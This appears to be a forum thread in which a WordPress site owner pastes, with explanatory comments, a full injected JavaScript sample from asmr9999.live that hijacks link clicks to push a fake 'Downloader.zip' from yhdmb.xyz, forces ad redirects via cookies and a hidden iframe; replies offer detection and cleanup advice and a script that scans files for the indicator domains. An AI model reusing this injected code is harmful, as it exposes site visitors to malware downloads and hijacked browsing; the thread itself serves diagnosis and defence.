Malicious code asmr9999 in Wordpress uses FileSaver.js and jszip

Time: 11-18

Scanning my site with PageSpeed shows that my site is loading malicious files in the background.

The problem happens occasionally, it doesn't happen all the time. Sometimes the site doesn't load the malicious script, other times it does. I don't know what it depends on.

In particular, the following JS script is loaded from this link "https:// asmr9999. live/static.js" (without spaces). So the malicious code is loaded indirectly.

if (!window.xxxyyyzzz) {
  // Only act on Windows browsers.
  function e() {
    return -1 !== ["Win32", "Win64", "Windows", "WinCE"].indexOf(
      window.navigator?.userAgentData?.platform || window.navigator.platform);
  }
  // On two specific sites, hijack clicks on post/product links and push a
  // "<name> Downloader.zip" from yhdmb.xyz instead of the real link target.
  function n(n) {
    if (!e()) return !1;
    var t = "File", a = n.target.closest("a");
    if (window.location.href.indexOf("3axis.co") >= 0) {
      if (0 > a.parentElement.className.indexOf("post-subject") && 0 > a.parentElement.className.indexOf("img")) return !1;
      t = a.children.length > 0 ? a.children[0].alt : a.innerText;
    } else {
      if (!(window.location.href.indexOf("thesimscatalog.com") >= 0) || 0 > a.parentElement.className.indexOf("product-inner")) return !1;
      t = a.children[1].innerText;
    }
    var i = document.createElement("a");
    return i.style = "display:none", i.href = "https://yhdmb.xyz/download/" + t + " Downloader.zip", document.body.append(i), i.click(), n.preventDefault(), !0;
  }
  // Inject a <script src=...> element into <head>.
  function t(e) { var n = document.createElement("script"); n.src = e; document.head.appendChild(n); }
  // Cookie helpers: a(name, value, hours) sets a cookie, i(name) reads one.
  function a(e, n, t) {
    var a = "";
    if (t) { var i = new Date; i.setTime(i.getTime() + 36e5 * t); a = "; expires=" + i.toUTCString(); }
    document.cookie = e + "=" + (n || "") + a + "; path=/";
  }
  function i(e) {
    for (var n = e + "=", t = document.cookie.split(";"), a = 0; a < t.length; a++) {
      for (var i = t[a]; " " == i.charAt(0);) i = i.substring(1, i.length);
      if (0 == i.indexOf(n)) return i.substring(n.length, i.length);
    }
    return null;
  }
  // Capturing click handler, removed after the first click on any link: either run
  // the download hijack above or, at most once per 6 hours (cookie __ads__opened),
  // open the real link in a new window and redirect this tab to the _ads_goto URL.
  function r(e) {
    var t = e.target.closest("a");
    null !== t && (n(e) || !i("__ads__opened") && window._ads_goto && (a("__ads__opened", "1", 6), "_blank" == t.target || (e.preventDefault(), window.open(t.href)), setTimeout(function () { window.location = window._ads_goto; }, 500)), window.removeEventListener("click", r));
  }
  t("https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js");
  t("https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/2.0.0/FileSaver.min.js");
  window.addEventListener("click", r, { capture: !0 });
  // The redirect target is delivered by postMessage from the hidden iframe below.
  window.addEventListener("message", function (e) {
    e.data && e.data instanceof Object && e.data._ads_goto && (window._ads_goto = e.data._ads_goto);
  });
  // Append a hidden iframe to the page once it has loaded.
  window.xxxyyyzzz = function (e) {
    var n = document.createElement("div"), t = document.createElement("iframe");
    t.src = e; n.style.display = "none"; n.appendChild(t);
    window.addEventListener("load", function () { document.body.append(n); });
  };
  window.xxxyyyzzz("https://yhdmb.xyz/vp/an.html");
}

From this code, is it possible to understand where the malware is located on my WordPress site? And also, is it possible to understand what exactly this code does?

I have seen that it also uses these scripts.


    CodePudding user response:

    You can find out who was the initiator of any loaded file. Open the developer console (Ctrl+Shift+I in Chrome) and choose the Network tab. After loading the page with the Network tab open, all loaded files will appear there. Locate your file and look at the Initiator column.

    But there can be a scenario where it is loaded from the DOM. So the next step will be to go to Elements, press Ctrl+F and search for this script. But this mustn't be your solution: it can be inserted into the HTML of your webpage by any malicious plugin. I prefer (at least if you are able to log into the WordPress admin) using some useful plugin for scanning, e.g. the plugin Anti-Malware Security and Brute-Force Firewall or some other scanning tool. It will probably find the concrete file/directory where the malicious code is.

    CodePudding user response:

    I have exactly the same issue on a CentOS VPS server and a custom CMS. I am using an Apache + nginx + PHP 5.6 configuration. My investigations are the following:

    1. I compared all my site scripts with the scripts from my previous backup and there are no changes in the site scripts!
    2. I checked all files on my server for the string "asmr9999" and for the same string encoded in Base64 format, YXNtcjk5OTk: the strings were not found. Also, I created a SQL database dump, but the dump doesn't contain these strings either!
    3. I checked the site using the ClamAV antivirus and the maldet tool, and no issues were found.
    4. Finally, I rebooted the server, and the scripts "<script src="https:// asmr9999 .live" disappeared from all my site pages! But after about 1 hour, the scripts appeared again on my site pages.

    So it seems that the script is located only in RAM and disappears during the server reboot. Then, after 1 hour, maybe the crontab loaded the script into RAM from some place.

    I hope this will save you time and together we will resolve this issue. I am continuing the investigation.
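Step 2 of the answer above greps for one Base64 spelling of the indicator, but the Base64 form of a substring depends on its 3-byte alignment inside the surrounding text, so a single encoding catches only one of three cases. The scanner below is an added example, not code from the thread: it derives the alignment-stable core for all three alignments of each domain quoted in the thread (the indicator list, form names and directory layout are assumptions) and reports hits per file.

```python
# Added example (not from the thread): find an indicator in plain or base64 form.
import base64
import os

# Constructed list built from the domains quoted in the thread above.
INDICATORS = ["asmr9999.live", "yhdmb.xyz"]


def base64_cores(indicator: str) -> list[str]:
    """Return the alignment-stable base64 core of the indicator for each of
    the three possible 3-byte alignments. Searching for one encoding only
    (e.g. YXNtcjk5OTk) misses the other two."""
    raw = indicator.encode()
    cores = []
    for k in range(3):
        enc = base64.b64encode(b"\x00" * k + raw).decode().rstrip("=")
        head = (0, 2, 3)[k]                   # chars tainted by the leading filler bytes
        tail = (0, 1, 1)[(k + len(raw)) % 3]  # chars tainted by whatever follows
        cores.append(enc[head:len(enc) - tail])
    return cores


def indicator_forms(indicator: str) -> dict[str, str]:
    """Map a form name (hypothetical naming) to the needle to search for."""
    forms = {"plain": indicator}
    forms.update({f"base64@{k}": c for k, c in enumerate(base64_cores(indicator))})
    return forms


def scan_text(text: str, indicators=INDICATORS) -> list[tuple[str, str]]:
    """Return (indicator, form) pairs present in text."""
    return [(ind, form) for ind in indicators
            for form, needle in indicator_forms(ind).items() if needle in text]


def scan_tree(root: str, indicators=INDICATORS) -> dict[str, list[tuple[str, str]]]:
    """Walk root (web root, SQL dump directory, cron directories) and report hits per file."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    hits = scan_text(fh.read(), indicators)
            except OSError:
                continue
            if hits:
                report[path] = hits
    return report
```

Since the poster suspects a cron job re-injects the script, run scan_tree() over /etc/cron* and /var/spool/cron as well as the web root and the SQL dump.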

    CodePudding user response:

    I have the same problem, have tried it two times now; the only thing I can do is log in to the admin, then in the WordPress editor switch Elementor to the WordPress editor and delete the string. BUT how did it get there?? I have Wordfence.
